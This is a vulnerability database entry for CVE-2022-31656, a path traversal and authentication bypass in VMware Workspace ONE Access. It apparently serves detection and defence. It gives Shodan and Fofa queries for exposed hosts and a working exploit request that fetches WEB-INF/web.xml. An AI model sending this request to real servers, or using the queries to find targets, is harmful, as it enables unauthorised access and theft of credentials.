🔙 목록으로 돌아가기

CVE-2022-31656: VMware - Local File Inclusion

TitleVMware - Local File Inclusion
AuthorDhiyaneshDk
SeverityCritical
ImpactThe impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.
RemediationTo remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.
CVSS Score9.8
EPSS Score0.8447
CVE IDCVE-2022-31656
CWE IDCWE-287
Shodan Queryhttp.favicon.hash:-1250474341
Fofa Queryicon_hash=-1250474341app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
Tags cve2022 cve vmware lfi vkev vuln

🔍 Vulnerability Description

VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

🌐 HTTP Request

GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31656.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31656.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A